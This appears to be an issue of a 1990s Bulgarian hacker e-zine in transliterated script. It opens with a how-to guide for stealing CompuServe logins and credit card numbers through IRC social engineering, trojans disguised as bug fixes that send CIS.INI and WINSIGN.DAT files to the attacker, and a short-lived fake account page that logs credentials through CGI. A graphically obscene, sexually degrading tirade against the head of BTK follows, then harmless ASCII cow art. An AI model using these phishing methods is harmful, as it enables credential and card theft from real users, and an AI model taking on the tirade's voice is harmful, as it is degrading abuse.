WINSIGN.DAT. Directnoto zapitwane za UserID i Password rqdkoº ºminawa, kamo li CC (ako wi trqbwat CC-ta otidete w #carding podqwolite...:)º ºW minaloto golqma chast ot accountite idwaha tochno ot IRC, no sega za da seº ºdokopate do nqkoq ribka, trqbwa naistina golqmo tyrpenie... Za ulesnenieº ºmove da si naglasite edin /timer, kojto prez 20-30 secundi da izpylnqwa /whoº º*.compuserve.com. Taka si garantirate periodichno oswedomqwane za poqwata naº ºewentualni nowi vertwi. Za razlika ot e-mail phishinga, pri IRC phishing-aº ºtrqbwa da bydete mnogo po-ubeditelni i da imate naistina prawdopodobnaº ºprichina da izkate UserID ili kakwoto i da bili drugo. Predi wreme minawasheº ºnomera... "usluvi mi s twojto CIS.ini, stoto mojto se razwali...". Da amaº ºtowa sega move naj-mnogo da wi obogati s nqkoq nowa kachestwena psuwnq. º º Move da se probwate i w CIS chat, no tam riskuwate da popadnete na nqkojº ºsystem operator, kojto da spomogne da wi hwanat. º º º º Troyan Horse Phishing º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º Samoto zaglawie sigurno wi podskazwa, che towa e metod, kojto seº ºrealizira s pomostta na troqnski kon (programa, koqto atakuwa otwytreº ºsistemata). Po technologichno izpylnenie se razlichawa ot e-mail phishingaº ºsamo po towa, che w mail-bodito se slaga link kym predwaritelno podsigurenº ºsite, ot kojto vertwata da si iztegli troqnskiq kon ili samiq izpylnim fileº ºse attach-wa kym samata posta. Koncheto ot swoq strana trqbwa da pretyrsiº ºdefault directoriijte na WinCIM /a move i celiq HDD/ za polezni file-cheta,º ºkoito biha mogli ewentualno da ni interesuwat - CIS.INI, WINSIGN.DAT i t.n.º ºWednyv nameril gi ste e dobre da prati edna swekawichna posta s poleznataº ºinformaciq do predwaritelno podgotwen e-mail address. Move da se opitwa daº ºse telnet-ne do opredelena sistema, kydeto da zapazi informaciqta, no towa eº ºpo-bawno. º º Naprimer: kym mail-bodyto prikrepqte programka, koqto twyrdi che oprawqº ºbygowe, pokazwa snimka na izprastacha ili predlaga bezplatna zastita otº ºHACKERI (!!!:) S podobna reklama si garantirate, che wseki po-golqm balykº º(ta dori i po-westite) ste si pusne exe-nceto. Scenariqt e plod na washetoº ºwyobravenie. º º Tozi metod e move-bi naj-produktivniqt w momenta, no toj iziskwaº ºpoznaniq za WinSock funkciite i Windows API. Otnowo trqbwa da steº ºdostatychno ubeditelni da nakarate user-cheto da pusne file-a... Move da seº ºpomisli za instalaciq, animaciijki, krasiwi kartinki i t.n. º º º º WEB Site phishing. º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º Sigurno powecheto ot was dori i ne sa chuwali za tozi metod, no toj eº ºdosta interesen, wypreki che e netradicionen (ako woobste move da se goworiº ºza phishing tradicii :) Za celta wi e nuvno malko free web space, poº ºwyzmovnost domain (no move bez nego) i poznaniq po pisane na CGI scriptowe.º º 1. Syzdawate prosta web-stranica, koqto se prawi che pokazwa wavnaº ºpersonal informaciq za potrebitelite, do koqto te po princip da nqmat lesenº ºdostyp (naprimer ostawasto on-line time ili credit balance). Pri wlizane wº ºstranicata trqbwa predwaritelno da im se poiska UserID i Password (a moveº ºdori i CC:). º º 2. Pishete CGI, kojto zapazwa UserID i Password. º º 3. Prawite edna hubawa masowa reklama (s e-mail ili w IRC) na stranicataº ºi se staraete za neq da razberat glawno CI$/SpryNet user-i. º º 4. Rabotite s gornata stranica 1-2 dena i posle q zatriwate po wyzmovnoº ºnaj-byrziq nachin. º º Mnogo efektiwen nachin, no stranicite gyrmqt byrzo (osobeno ako sa wº ºTripod ili GeoCities), a i CGI scriptowete ne sa po dusha i syrce na wseki.º ºWmesto CGI move da izpolzwate JavaScript - raboti systo tolkowa bezyprechno.º º º º Ending Words. º º úÄÄÄÄÄÄÄÄÄÄÄú º º º º Kato zakliuchenie move da otbelevim, che za da se dokopate do chiijto iº ºda bilo UserID i/ili password trqbwa da proqwite naistina dostaº ºizobretatelnost, ala towa w nikakyw sluchaj ne e newyzmovno. º º Za nestastie (ili move bi za stastie :) dosta CI$/Spry user-iº ºpropishtqha prez poslednite 2 godini, taka che na wseki 50-100 dushi samoº º1-2 biha se wyrzali na phishinga... wsichko si zawisi ot ubeditelnostta ! º º __ º º <\//\ /\ < > º º \< \/ <__>ancient \/ ain º Ç Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä¶ º º º Who the fuck is BTK ? By: Hipodilsky º º ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ ÄÍÍÍÍÍÍÍÍÍÍÍÍÄ º º º º Ne ste li si mislili ponqkoga, che BTK ni nosi i nqkakwo skrito poslanieº ºw inicialite si ? Eto nqkolko predloveniq... º º º º Baba Typche Kornishoni º º Babichka Typche Kartofi º º Babenca Tyrshuwat iz Kiler º º Bardak, Pylen s Kurwi º º Barmanyt e Typo Kopele º º Bashtata Tropa s Kokali º º Bawni, Typi, Klyoshtawi º º Bebeshki Topki w Kutia º º Beleznikaw Titanichen Krokodil º º Belosan Tramwaen Kenef º º Bez Teb mi e Kef º º Bezhowi Topchesti Kozhoderi º º Bezmerno Triygylen Kurnik º º Bezpostaden Trawestitski Kur º º Bezmozychni Typi Kopeldaci º º Bqgaj Tatko, Kamion! º º Bijte Typanarki s Kef º º Bledoto Tresawishte na Kurwite º º Blyskasht Typanarski Kozhuhar º º Bob-chorba, Towaren w Kamaz º º Bodem Tashaci s Karfici º º Bodigard Troshi Koshnica º º Bodliwi Teleshki Kosmi º º Bog e Typ Kelesh º º Bogati Typi Kreteni º º Bolna Tiranichna Kukumyawka º º Boyadisana Troshliwa Kosachka º º Bozadzhia Trawmira Kura-si-Yanko º º Bozhestwena Tochka s Krachka º º "Brej, k'wi Typi Komsomolci" º º Brysnati Trynliwi Kaputi º º Brysnete si Topkite w Kuhniata º º Budilnik si Trese Kura º º Bunaci Typaci Kreteni º º Bydesht Takowan Kosmonawt º º Bydete Typi i Kuhi º º Bydi Taka Koshmaren º º Bylgarska Telefonna Kasapnica º º Bylgarska Tenekidzhijska Kompania º º Bylgarski Tranziten Kenef º º s Beleznici w Tymna Kilia º º s Bql i Tesen Kyr º º º º º º I kato dopylnenie kym po-gornite predpoloveniq pyblikuwame i chast otº ºgnewnite misli na Hipodilski, izkazwashti mnenieto mu za shefa (ili kojtoº ºtam) na BTK, sled kato modema mu e dropil za N-ti pyt... º º º º "A, be, ti smotan izpederastyal nedorazwit poluskopen gadenº ºednotashachest izrod, kojto denem i noshtem blenuwa samo chukane na shugawiº ºkrastawi kozi... Sluchajno nyakoga da sa ti doweryawali fakta, che siº ºwyzmozhno naj-izrodskoto lajnomozychno muhlyasalohuesto shibanoº ºkamiloblizheshto izbrysnatogyzo pypchiwotopchesto gadno trizhdi pytiº ºiznasilwano ot druzhnata romska rasa homoseksualno putkohujche, koeto priº ºwida na Sashka Wasewa se prazni tiho w gashtite si?! Neka sperma da gnie wº ºtwojta utroba i nad klitora ti da tegne prokoba, dano. Shte ti prysna i bezº ºt'wa razprania muhlyasal i gnoyasal gewrek, shte ti go nagnetya do gryklyanaº ºchak. Wseki pyt kogato kihnesh, iz wyzduha se kondenzirat milioni kapchiciº ºmenzis, othwyrchat shrapnelesti parcheta zasyhnal fyrgoch, rezultat otº ºtwoyata nestihwashta strast kym oralnia seks. Ot razprania ti, asimetrichenº ºot shibane gyz, izdran ot mnogobrojni polowi izjulwania prez shirokia tiº ºanalen otwor, chesto izpylzyawat mrachni mutirali formi na zhiwot, polucheniº ºpri smeswane na spermata na mnogobrojnite agresori i zabludili se tamº ºwyshki, tyrseshti otchajano izlaz na suho. Wsichkite ti wyzmozhni dupki saº ºprekomerno razshireni ot chestata sreshta s myzhki ogromni polowi organi,º ºchiito pritezhateli sa dostatychno smotani, che da se reshat da te izpolzwatº ºpo prednaznachenie, zashtoto ti si nyakakyw shiban inkubator za wenericheskiº ºbolesti, izmisleni syakash specyalno za teb. Kogato w lyawata ti gnoyasalaº ºnozdra nawleze wibrator, ot drugata zapochwa nespiren potok ot heterogennaº ºsmes ot wsyakakwi telesni technosti, naj-weche chuzhdi, zashtoto gadniteº ºmazni sysireci, pytuwashti iz cyaloto ti izpypcheno i gangrenyasalo kriwoº ºtyalo, sa tam w rezultat na denonoshtnite neizbroimi izprazwania, koitoº ºtolkowa blenuwash. Kogato (a topwa stawa chesto) i w dwete ti razpraniº ºnozdri se natikat bodro dwa palamara, syshtyat proces se powtarya prezº ºushite. Towa e to, edna izchukana, shibana, izblizana, muhlyasala mashina zaº ºkolekcionirane na mirizliwa sperma, koyato na talazi izblikwa ot wsyakaº ºtwoya pypka wseki pyt, kogato beglo se opitash da izobrazish neskoposanoº ºgadna kriwozyba otwrashtawashta usmiwka. SHE TI NAWRA BLOTTO BOX W GYZA Iº ºSHTE GO PUSNA, PEDAL MIRIZLIW GNUSEN SHIBAN NEKADYREN...SHE DIGASH CENITEº ºPAK, A?!" º º º º Ta taka, w gorespomenatia epistolaren otkys sa wpleteni osobenosti i naº ºmyzhkata, i na zhenskata anatomia, tyj kato polyt na shefa na BTK ne eº ºizwesten na Hipo ("oswen twa hich me mi dreme na grezdeja dali ima huj iliº ºne..."). º Ç Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä¶ º º º The Complete Guide to Cows Brought to you By: EXo º º ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ º º º º As you've NEVER seen them before! º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º (__) º º (oo) º º /ÄÄÄÄÄÄÄ\/ º º / ³ ³³ º º * ³³ÄÄÄij³ º º ^^ ^^ º º Cow (Krava) º º º º Side Front Side back º º (__) (__) (__) (__) º º ( oo (oo) oo ) ( ) º º /\_³ /\/\ ³_/\ / \ º º º º º º úþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþúùúþú º º º º º º (__) (__) (__) º º (oo) (oo) (oo) º º /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ º º / ³ ³³ / ³ ³³ / ³ ³³ º º * ³³ÄÄÄij³ * ³³WÄÄij³ * ³³wÄÄij³ º º ^^ ^^ ^^ ^^ ^^ ^^ º º Cow Cow laden Same cow º º with milk after milking º º º º (___) (___) * (___) º º (o o) (o o) \ (o o) º º /ÄÄÄÄÄÄÄ\ / /ÄÄÄÄÄÄÄ\ / \ÄÄÄÄÄÄÄ\ / º º / ³ ³³O / ³ ³³O ³ ³³O º º * ³³,ÄÄij³ * ³³@\Äij³ ³³,ÄÄij³ º º ^^ ^^ ^^ ^^ ^^ ^^ º º Bull Same bull after Rotc bull after º º seeing above cow seeing other bull º º º º º º º º (__) (__) (__) (__) º º (oo) (oo) (oo) (oo) º º /ÄÄÄÄÄÄÄ\/Ä* /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ ~~~~~~~~~~~~~~~~~~~~~ º º / ³ ³³ \ )*)(\/* / * / ³ ³³ º º * ³³ÄÄÄij³ * \ ³³³/)³/()( ~~~~~~~~~~~~~~ º º \/³(/)(/\/(,,/ \)³(/\/³)(/\ º º Cow munching Grass munching Cow in water Cow in trouble º º on grass on cow º º º º (__) (__) * (__) * (__) º º (oo) (oo) \ (oo) ³ (oo) º º /ÄÄÄÄÄÄÄÄ\/ /ÄooooooÄ\/ \ÄÄÄÄÄÄÄ\/ \ÄÄÄÄÄÄÄ\/ º º * o³ ³³ * ooooooooo o o³ ³³ / ³³ º º ³³ÄÄÄij³ ooooooooooooo ³³ÄÄÄij³>ÍÍ/ÄÄÄÄij³ º º ooo^^ ^^ ooooooooooooooooo ^^ ^^ ^^ º º Cow taking Cow in deep Cow getting the shit º º a shit shit kicked out of her º º º º º º (__) º º (oo) U º º /ÄÄÄÄÄÄÄ\/ /ÄÄÄV º º / ³ ³³ * ³Äij . º º * ³³ÄÄÄij³ º º ^^ ^^ º º º º Cow at 1 meter. Cow at 100 meters. Cow at 10,000 meters. º º º º º º º º (__) (__) (__) º º (OO) (@@) (xx) º º /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ º º / ³ ³³ / ³ ³³ / ³ ³³ º º * ³³ÄÄÄij³ * ³³ÄÄÄij³ * ³³ÄÄÄij³ º º ^^ ^^ ^^ ^^ ^^ ^^ º º º º Cow who drank Jolt Cow who ate Cow who used Jolt to wash º º psychadelic mushrooms down psychadelic mushrooms º º º º º º /\ __ º º / \ ³³ º º (__) (__) \ / (_³³_) º º SooS (oo) \/ (oo) º º /ÄÄÄÄÄÄS\/S /ÄÄÄÄÄÄÄ\/ /S /ÄÄÄÄÄÄÄ\/ º º / ³ ³³ / ³ ³³ / S / ³ ³³ º º * ³³ÄÄÄij³ * ³³ÄÄÄij³___/ S * ³³ÄÄÄij³ º º ^^ ^^ ^^ ^^ ^^ ^^ º º This cow belonged Ben Franklin owned Abe Lincoln's º º to George Washington this cow cow º º º º º º (__) º º * (__) (oo) º º \ (oo) /ÄÄÄÄÄÄ\/ º º \ÄÄÄÄÄÄÄ\/ /³ ³/ ³ º º ³ ÍÍ$ ³³ / ³ [) ³³ º º ³³ÄÄÄij³ * ³³ÄÄÄij³ º º ^^ ^^ ^^ ^^ º º Old "One Arm" belonged This cow was given to º º to Ceasar's Palace Hugh Hefner for his Birthday º º º º º º (___) (__) (__) º º ( O ) (oo) (oo) º º /ÄÄÄÄÄÄÄ\ / \/ÄÄÄÄÄÄÄÄ\/ º º / ³ ³³V ³ ³ º º * ³³ÄÄÄij³ ³³ÄÄÄÄÄij³ º º ^^ ^^ ^^ ^^ º º The cyclops that Jason and This cow lived with º º the Argonauts met had this cow Dr. Doolittle º º º º º º (__) (__) º º [##] (@o) º º /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ (__) º º / ³ ³³ / ³ ³³ / ³ ³³ (oo) º º * ³³ÄÄÄij³ * ³³ÄÄÄij³ * ³³ÄÄÄijÄÄÄ\/ º º ^^ ^^ ^^ ^^ ^^ ^ º º This cow belonged This cow lived with This cow belonged to º º to Flash Gordon the Little Rascals the Headless Horseman º º º º º º (____) (____) (____) º º (oo ) (o o) ( O O) º º /ÄÄÄÄÄÄÄÄÄÄÄ\ / /ÄÄÄÄÄ\ /ÄÄÄÄ /ÄÄÄÄÄÄÄÄÄÄÄ\ / º º / ³³ ³ \/ / ³ ³ \/ ³ / ³³ ³ \/ º º / ³³ ³³³³ \ ³ ³ ³ ³ ³ / ³³ ³³³³ º º * ³³³³ÄÄÄÄij³³³ *³ ³ ³ÄÄÄÄij ³ ³ * ³³³³ÄÄÄÄij³³³ º º /\/\ /\/\ /\ /\ /\ /\ ^^^^ ^^^^ º º This cow belonged This was Salvatore No one was sure whether º º to Pablo Picasso Dali's favorite cow M.C. Escher's cow had four º º legs or eight º º º º º º O__O \_³_/ º º (oo) (oo) º º /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ º º / ³ ³³ / ³ ³³ º º * ³³ÄÄÄij³ * ³³ÄÄÄij³ º º ^^ ^^ ^^ ^^ º º Cow at Disneyland Cow visiting the Statue of Liberty º º º º º º º º (__) º º ^^ (oo) º º ^^^^ /ÄÄÄÄÄÄÄ\/ º º ^^^^^ / ³ ³³ º º ^^^^^ * ³³ÄÄÄij³ º º ^^^^^^^^ ÍÍÍÍ^^ÍÍÍÍ^^ÍÍÍÍ º º ^^^^^^^^^^^^^/ º º ^^^^^^^^^^^^^^^^^^ º º ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ º º Cow Hanging Ten at Malibu º º º º º º º º )\ (__) º º / \ (oo) º º ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ º º Cow swimming at Amityville º º (Where Jaws was filmed, for those less educated) º º º º º º * º º \ º º \ / / / / / / / / / / / º º ³\ / / / / / / / / / / / / º º \ ³ \ (__) / / / / / _______ / / º º \\³³ \(oo) / / / / ³ \ / / º º \³³\ \\/ / / / (__)³ / / º º ^^ \³³ / / / (oo)³ / / º º \\ ³³ /ÄÄÄÄÄÄÄ\/ ³ º º \\³³ / ³ ³³^_³ º º \³³ * ³³ÄÄÄij º º ^^ ^^ ^ º º \\_ º º \_ Cow sheltering from English Weather º º Cow skiing a Black Diamond at Aspen º º º º º º (__) (__) (__) º º (DD) (oo)ÍÍÍ(oo) º º /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ \/ÄÄÄÄÄÄÄ\ º º / ³ ³³_\_/ / ³ ³³ ³³ ³ \ º º * ³³ÄÄÄij * ³³ÄÄÄij³ ³³ÄÄÄij³ * º º ^^ ^ ^^ ^^ ^^ ^^ º º Cow chugging brews and staring at Siamese cows º º sunbathers at Fort Lauderdale º º º º º º o o (__) ^ º º \ / (oo) / º º \ / _____\/___/ º º (__) \__/ / /\ / / º º (oo) _______(oo) ^ / * / º º /ÄÄÄÄÄÄÄÄÄ\/ /³ ___ \/ / ___/ º º / ³ xÍa(b)³³ / ³ { }³³ *ÄÄÄÄ/\ º º * ³³ÄÄÄÄÄij³ * ³³{___}³³ / \ º º ^^ ^^ ³³ÄÄÄÄij³ / / º º ^^ ^^ ^ ^ º º º º Mathematical Television This cow does Disco º º Cow Cow (That's what comes of º º (developer of (CowÄthode snorting cowÄcaine) º º cowÄculus) Ray Tube) º º º º o º º ³ [ÄÄÄ] º º ³ ³ º º ³ ³ ³ÄÄÄÄÄÄÍÍÍÍÍÍÍͳ º º /ÄÄÄijÄÄij\ ³ **** ³ÍÍÍÍÍÍͳ º º /___/___\___\ o ³ **** ³ÍÍÍÍÍÍͳ º º ³ ³ ___³ ³ÍÍÍÍÍÍÍÍÍÍÍÍÍͳ º º ³ ³ ___ {(__)} ³ÍÍÍÍÍÍÍÍÍÍÍÍÍͳ º º \ÄÄÄÄÄÄÄÄÄÄÄ/ []( )Í{(oo)} ³ÍÍÍÍÍÍÍÍÍÍÍÍÍͳ º º \ \ / / /ÄÄÄÍÍÍÄÄ{ \/ } ³ º º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ / ³ NASA ³ÍÍÍÍ ³ º º ³ ³ * ³³ÄÄÄÄÄij³ÄÄÄÄÄ^ º º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ³³ ³ ³ º º / / \ \ ^^ ^ ³ º º / ÄÄÄÄ \ º º ^^ ^^ This cow jumped over the Moon º º º º º º (___) º º \^^^^^^^^\ (__) (o o) º º \^^^^^^^^\\ (oo) \ / º º *ÄÄÄÄÄ\_______\/\/ \ÄÄOÄÄ/ º º ^_______/ ÄÄÄ \______^ // ÄÄÄÄÄ\ º º ^ÄÄÄÄÄÄÄÄ\ \S/ /\_____^ \\/_^{} /ÍÍVÍÍÍ[] º º \______/ \_____\\// º º \__/ º º It's a bird... //\\ The Boss º º It's a plane... // \\ (Bruce Holstien) º º // // º º ^^ ^^ º º º º º º ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ º º ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ H H º º ³ ³ÄÄÄÄÄÄÄÄÄÄÄÄij H (__) H º º ³ ³ ________ ³ H (oo) H __ º º ³ COWNTY ³ ³ (³__³) ³ ³ H / \/ \ H / \ º º ³ JAIL ³ ³ ³oo³ ³ ³ H ³ ³ ³ ³ H ³ STOP ³ º º ³ ³ ³__³\/³__³ ³ H DÍÍÍbÍÄÄÄÄÄ H \ __ / º º ³ ³ o ³ H^^^^^^^^^^^^^^^^H ³³ º º ³ ³ ^ ³ H H ³³ º º ³ ³ ] ³ H H ³³ º º ³ ³ ³ H H ³³ º º ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÙ H H ³³ º º ^^^^^^^^^^^^^^^^^^ ^^^^^^^ º º Some cows get in trouble... Cattle Guard º º º º º º ( ( ) º º ( ( ) ) º º ( ( ) º º ( / ) º º ( ( \\ ) º º ( ³ // ) º º ³ ³ (__) º º ³ ³ (oo) (__) º º ³ ³ ÄÄÄÄ\/ ______(oo)_____ º º ³ ³ ³³ ( _)_______(__) ) º º **³ ³ ÄÄij³ \ __________/ º º ``'ÄÄÄÄÄÄÄÄÄ^^ º º Cow Hide Cow Pie º º º º º º \ ³ / ÚÄÄÄÄÄÄÄÄÄÄÄ¿ º º ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ \ \_# / ³ ___ ³ ÚÄÄÄÄÄÄÄÄÄ¿ º º ³ ³ \ #/ ³ ³ ³ ³ ³ Í Í Í Í ³ º º ³ ³ ³ ³ ³ \\# ³ ³`v'³ ³ ³ ³ º º ³ ³ \# // ³ ÄÄÄ ___ ³ ³ ³ ³³ ³ ³ º º ³ ³ ³ ³ ³ #_// ³ ³ ³ ³ ³ ³ º º ³ ³ \\ #_/_______ ³ ³ ³ ³ ³ ³ ³³ ³ ³ º º ³ ³ ³ ³ ³ \\# /_____/ \ ³ ÄÄÄ ³ ³ ³ º º ³ ³ \# ³+ ++³ ³ ³ ³^^^^^^³ ³ ³ ³ ³³ ³ ³ º º ³ ³ \# ³+ ++³ ³ ³ ³^^^^^^³ ³ ³ ³ ³³ ³ ³ º º ^^^³ (^^^^^) ³^^^^^#^³ H ³_ ³^³ ³ ³³³³ ³ ³^^^^^^³ ³ º º ³ ( ³³³ ) ³ # ^^^^^^ ³ ³ ³³³³ ³ ³ ³ ³³³³³³³ ³ º º ^^^^^^^^^^^^^________/ /_____ ³ ³ ³³³³ ³ ³ ³ ³³³³³³³ ³ º º `v'Ä ^^^^^^^^^^^^^ ³ ³³³³³³³ ³ º º ³³ ³`. (__) (__) ( ) º º (oo) (oo) /ÄÄÄV º º /ÄÄÄÄÄÄÄ\/ \/ ÄÄÄÄÄÄÄÄ\ * ³ ³ º º / ³ ³³ ³³_______³ \ º º * ³³WÄÄij³ ³³ ³³ * º º ^^ ^^ ^^ ^^ º º º º "Cow Town" º º º º º º \ (__) (__) º º \\(oo) (\/) º º /ÄÄÄÄÄ\\\/ /ÄÄÄÄÄÄÄ\/ º º / ³ (##) / ³ ³³ º º * ³³ÄÄÄij³" * ³³ÄÄÄij³ º º ^^ ^^ ~~ ~~ º º This cow plays bagpipes. Cow from Beijing º º º º º º (__) (__) (__) º º (\/) ($$) (**) º º /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ º º / ³ 666 ³³ / ³ÍÍÍÍͳ³ / ³ ³³ º º * ³³ÄÄÄij³ * ³³ÄÄÄij³ * ³³ÄÄÄij³ º º ^^ ^^ ^^ ^^ ^^ ^^ º º º º Satanic cow This cow is a Yuppie Cow in love º º º º º º (___) º º (o o) (__) º º /ÄÄÄÄÄÄ\ / (__) (__) (oo) º º / ____O (oo) (oo) /ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\/ º º ³ / /ÄÄÄÄ\ÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ / ³ ³³ º º /\ooÍÍͳ / ³³ / ³ ³³ * ³³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij³ º º ³ ³³ *³³^ÄÄÄÄij³ * OOÄÄÄÄOO ^^ ^^ º º * ^^ ^^ ^^ Stretch Cow º º Cowt in the Act low rider cow º º º º º º (__) (__) \_³³_~ º º (oo) (oo) (*³³*) º º /ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\/ /ÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\³³/ º º / ³ ³³ / ³³ / ³ ³³ º º * ³³ÄÄÄÄÄÄÄÄÄÄÄij³ *ij³ÄÄÄij³ * ³³ÄÄÄij³ º º OO OO OO OO OO }{ º º liÄmooÄcow fastback cow teenager's cow º º º º º º ____ º º (____) º º .xxxx. º º (__) '(oo)` º º (oo) /ÄÄÄÄÄ'Ä\/ ` º º /ÄÄÄÄÄÄÄ\/ / ³ ³ÍÍÍÍÍÍÍÍÍÍÍÍ> º º / ³ ³³ * ³³ÄÄÄij (~) º º * ³³ÄÄÄij³ ~~ ~ º º ~~ ~~ MooÄammar Cowdafi º º holy cow armed and dangerous º º º º º º (___) (___) º º (o o) (o o) º º /ÄÄÄÄÄÄÄ\ / /ÄÄÄÄÄÄÄ\ / º º / ³ ³³O / ³ O~ ³³O º º * ³³,ÄÄij³ * ³³,ÄÄij³ º º ^^ ^^ ^^ ^^ º º A Bull AÄbombÄinÄaÄbull NoÄbull º º º º º º (___) º º (o o) º º (ÄÄÄÄÄ) \ / º º / / \ O (Anti-BTK Bull :) º º * ³ O ³ º º ÄÄÄÄÄ º º Phone Bull º º º º º º ³ ³ ³ ³ * º º ³ ³ (__) ³ ³ \ (__) º º ³ ³ (oo) ³ ³ \ (oo) º º ³ ³ /ÄÄÄÄÄÄÄ\/ ³ ³ ÄÄÄÄÄÄÄÄÄÄÄ\/ÄÄ º º ³ ³ / ³ ³³ ³ ³ ÄÄÄij ³ÄÄÄ º º ³ ³ * ³³ÄÄÄij³ ³ ³ ÄÄÄÄÄÄÄÄ º º ³ \______^^____^^___ ³ \_________________ º º ³ _________________ ³ _________________ º º ³ / ³ / º º ³ ³ ³ ³ º º ³ ³ ³ ³ º º ³ ³ ³ ³ º º ³ ³ ³ ³ º º ³ ³ ³ ³ º º ³ ³ ³ ³ º º ³ ³ ³ ³ º º / \ / \ º º º º Cow perched on a tree. Cow attempting to fly off tree. º º º º º º ³ ³ º º ³ ³ º º ³ ³ º º ³ ³ º º ³ ³ º º ³ \_________________ º º ³ _________________ º º ³ / º º ³ ³ º º ³ ³ º º ³ ³ º º ³ ³ º º ³ ³ º º ³ ³ (__) º º ³ ³ *ÄÄÄÄÄÄÄÄÄ(..) º º / \ ^^ÄÄÄÄ^^\/ º º º º Cow that has failed miserably in the attempt. º º º º ...ÄÄÄ... º º ../ / ³ \ \.. . /\ . . º º ./ / / ³ \ \ \. . / \ . . º º / / / ³ \ \ \ / \ . . * º º / / / ³ \ \ \ / \ * º º ^^^^^^^^^^^^^^^^^^^^^^^ ³ (__) ³ . . ** º º \ ³ / . /³ (oo) ³\ ** º º \ ³ / / ³ /\/\ ³ \ . . * º º \ ³ / . / ³Í³Íͳͳ \ . * º º \ ³ / . / ³ ³ ³ ³ \ . º º \ ³ / / USA ³ ^³³^ ³NASA \ . º º \ ³ / ³______³ ^^ ³______³ . º º \ ³ / . (__³³__) . . º º \ ³ / . /_\ /_\ . . . º º \ ³ / !!! !!! º º \ ³ /(__) º º \³/ (oo) The cow that jumped over the moon. º º /ÄÄÄ++ÄÄ\/ º º / ³ ³³ ³³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ º º * ³³Ä++ij³ <ÄÄÄÄÄÄ´ Cow surviving ³ º º ^^ ^^ ³ attack by Red Baron ³ º º ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º º º º º º (__) ..ÄÄÄ.. º º (oo) / \ º º /ÄÄÄ+ +ÄÄ\/ ³ RIP ³ º º / ³ ³ ³ ³³ ³ ³ º º * ³³Ä+ +ij³ ³ ³ º º ^^ ^^ ³ ³ º º ³ ³ º º David Copperfield's Cow \\\\\\\\\\\\\\\///////////////// º º º º Elvis's Cow... º º º º º º (__) º º (oo) º º /ÄÄÄÄÄÄÄ\/ º º / ³ ³³ º º * ³³ÄÄÄij³ º º ^^ ^^ º º (__) (__) º º (oo) (oo) º º /ÄÄÄÄÄÄÄ\/ \/ÄÄÄÄÄÄÄ\ º º / ³ ³³ Ä^^Ä ³³ ³ \ º º * ³³ÄÄÄÄ Ä^^Ä ³³ * º º ^^ ^^ º º (__) (__) º º (oo) (oo) º º /ÄÄÄÄÄÄÄ\/ \/ÄÄÄÄÄÄÄ\ º º / ³ ³³ ³³ ³ \ º º * ³³ÄÄÄij³ ³³ÄÄÄij³ * º º ^^ ^^ ^^ ^^ º º Barnum's Troupe of performing cows º º º º º º º º (__) _ÄÄÄÄÄÄÄÄ_ º º (oo) ³__________³ BIG º º /ÄÄÄÄÄÄÄ\/ XXXXXXXXXX MAC º º / ³ 007 ³³ __________ º º * ³³ÄÄÄij³ ³_ _³ º º ^^ ^^ ÄÄÄÄÄÄÄÄ º º Cow licenced to kill Enemy Cow after having met previous cow º º º º º º (__) º º (oo) º º /'^^^Äm º º (__) / '' ` ) º º (oo) o /³ /³/³_ ³ /³ º º / \/ / / _ / ³ ³ ³ ³ º º / _\ÍÍÍ^ ___\_____/___ ³_____³_³ º º ___³__/ ³/\ (___________(_) //³³ ³³ º º * ^ ^ * ww ww º º º º Mrs. O'Leary's Cow Cow'nt Dracula º º º º º º * (__) (__) (__) (__) º º \ (oo) (oo) (oo) (oo) º º \ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ /ÄÄÄÄÄÄÄ\/ º º /³ ³\ / / \ / \ / / \ 